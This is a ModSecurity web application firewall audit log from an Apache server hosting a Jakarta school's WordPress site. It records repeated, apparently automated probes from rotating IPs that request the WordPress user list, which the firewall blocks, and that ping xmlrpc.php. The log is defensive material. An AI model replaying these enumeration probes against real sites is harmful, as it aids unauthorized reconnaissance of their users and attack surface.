Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afdc0830-Z-- --32cf8c15-A-- [17/May/2025:23:02:17 +0700] aCizCXyxdQCiyU1ENFepJgAAAAY 103.236.140.4 34044 103.236.140.4 8181 --32cf8c15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --32cf8c15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32cf8c15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497737876804 2292 (- - -) Stopwatch2: 1747497737876804 2292; combined=1240, p1=413, p2=794, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32cf8c15-Z-- --68d2156e-A-- [17/May/2025:23:02:22 +0700] aCizDhKi5m5upc8uMd4gywAAANE 103.236.140.4 34254 103.236.140.4 8181 --68d2156e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68d2156e-C-- demo.sayHello --68d2156e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d2156e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497742301189 5877 (- - -) Stopwatch2: 1747497742301189 5877; combined=4842, p1=617, p2=3982, p3=40, p4=41, p5=98, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d2156e-Z-- --5e56d619-A-- [17/May/2025:23:02:31 +0700] aCizF3yxdQCiyU1ENFepZgAAAAE 103.236.140.4 34644 103.236.140.4 8181 --5e56d619-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e56d619-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e56d619-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497751464916 2014 (- - -) Stopwatch2: 1747497751464916 2014; combined=1011, p1=387, p2=602, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e56d619-Z-- --2e22684f-A-- [17/May/2025:23:02:42 +0700] aCizIum4kjNN-hEbWjKphgAAAEA 103.236.140.4 35136 103.236.140.4 8181 --2e22684f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e22684f-C-- demo.sayHello --2e22684f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e22684f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497762695231 5616 (- - -) Stopwatch2: 1747497762695231 5616; combined=4452, p1=580, p2=3621, p3=41, p4=42, p5=98, sr=73, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e22684f-Z-- --60361a64-A-- [17/May/2025:23:04:01 +0700] aCizcXyxdQCiyU1ENFeqkAAAAAs 103.236.140.4 38530 103.236.140.4 8181 --60361a64-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --60361a64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60361a64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497841799517 2555 (- - -) Stopwatch2: 1747497841799517 2555; combined=1037, p1=349, p2=661, p3=0, p4=0, p5=27, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60361a64-Z-- --ea852d0c-A-- [17/May/2025:23:04:09 +0700] aCizeem4kjNN-hEbWjKriAAAAEE 103.236.140.4 38960 103.236.140.4 8181 --ea852d0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ea852d0c-C-- demo.sayHello --ea852d0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea852d0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497849354039 6012 (- - -) Stopwatch2: 1747497849354039 6012; combined=4597, p1=636, p2=3730, p3=34, p4=38, p5=95, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea852d0c-Z-- --31fef111-A-- [17/May/2025:23:04:20 +0700] aCizhOm4kjNN-hEbWjKr3wAAAE0 103.236.140.4 39482 103.236.140.4 8181 --31fef111-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --31fef111-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31fef111-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497860334975 2081 (- - -) Stopwatch2: 1747497860334975 2081; combined=972, p1=322, p2=626, p3=0, p4=0, p5=24, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31fef111-Z-- --45acab07-A-- [17/May/2025:23:04:26 +0700] aCizigTOsBn9MSWb6WLfagAAAIE 103.236.140.4 39824 103.236.140.4 8181 --45acab07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --45acab07-C-- demo.sayHello --45acab07-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --45acab07-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497866001298 5469 (- - -) Stopwatch2: 1747497866001298 5469; combined=3921, p1=507, p2=3195, p3=35, p4=38, p5=87, sr=63, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45acab07-Z-- --0af85372-A-- [17/May/2025:23:06:16 +0700] aCiz-ATOsBn9MSWb6WLiBwAAAI8 103.236.140.4 46706 103.236.140.4 8181 --0af85372-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0af85372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0af85372-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497976220844 3094 (- - -) Stopwatch2: 1747497976220844 3094; combined=1514, p1=532, p2=956, p3=0, p4=0, p5=26, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0af85372-Z-- --3666fe43-A-- [17/May/2025:23:06:22 +0700] aCiz_gTOsBn9MSWb6WLiGgAAAIo 103.236.140.4 47172 103.236.140.4 8181 --3666fe43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.57 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3666fe43-C-- demo.sayHello --3666fe43-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3666fe43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497982625495 6490 (- - -) Stopwatch2: 1747497982625495 6490; combined=4752, p1=509, p2=3964, p3=51, p4=65, p5=94, sr=60, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3666fe43-Z-- --f65bd329-A-- [17/May/2025:23:07:31 +0700] aCi0Q3yxdQCiyU1ENFevZAAAAAI 103.236.140.4 51960 103.236.140.4 8181 --f65bd329-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f65bd329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f65bd329-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498051597488 4160 (- - -) Stopwatch2: 1747498051597488 4160; combined=2446, p1=761, p2=1637, p3=0, p4=0, p5=48, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f65bd329-Z-- --0579ba70-A-- [17/May/2025:23:07:37 +0700] aCi0SRKi5m5upc8uMd4o4wAAAMY 103.236.140.4 52344 103.236.140.4 8181 --0579ba70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0579ba70-C-- demo.sayHello --0579ba70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0579ba70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498057438260 4535 (- - -) Stopwatch2: 1747498057438260 4535; combined=3409, p1=423, p2=2775, p3=28, p4=31, p5=88, sr=56, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0579ba70-Z-- --e0da8107-A-- [17/May/2025:23:08:45 +0700] aCi0jRKi5m5upc8uMd4rBwAAANM 103.236.140.4 57154 103.236.140.4 8181 --e0da8107-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0da8107-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0da8107-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498125166856 1769 (- - -) Stopwatch2: 1747498125166856 1769; combined=879, p1=277, p2=555, p3=0, p4=0, p5=47, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0da8107-Z-- --7283bc74-A-- [17/May/2025:23:08:50 +0700] aCi0kgTOsBn9MSWb6WLl-AAAAI8 103.236.140.4 57540 103.236.140.4 8181 --7283bc74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7283bc74-C-- demo.sayHello --7283bc74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7283bc74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498130088590 4196 (- - -) Stopwatch2: 1747498130088590 4196; combined=2873, p1=359, p2=2354, p3=23, p4=26, p5=65, sr=48, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7283bc74-Z-- --0d5e1147-A-- [17/May/2025:23:10:02 +0700] aCi02hKi5m5upc8uMd4togAAANg 103.236.140.4 34236 103.236.140.4 8181 --0d5e1147-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0d5e1147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d5e1147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498202166610 3297 (- - -) Stopwatch2: 1747498202166610 3297; combined=1708, p1=531, p2=1148, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d5e1147-Z-- --de4fc928-A-- [17/May/2025:23:10:06 +0700] aCi03nyxdQCiyU1ENFey7AAAAAU 103.236.140.4 34592 103.236.140.4 8181 --de4fc928-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.74 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --de4fc928-C-- demo.sayHello --de4fc928-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --de4fc928-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498206845239 6272 (- - -) Stopwatch2: 1747498206845239 6272; combined=4832, p1=628, p2=3955, p3=43, p4=56, p5=89, sr=63, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de4fc928-Z-- --a4c5b820-A-- [17/May/2025:23:10:42 +0700] aCi1AhKi5m5upc8uMd4vRwAAAMg 103.236.140.4 37138 103.236.140.4 8181 --a4c5b820-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4c5b820-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4c5b820-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498242401621 2505 (- - -) 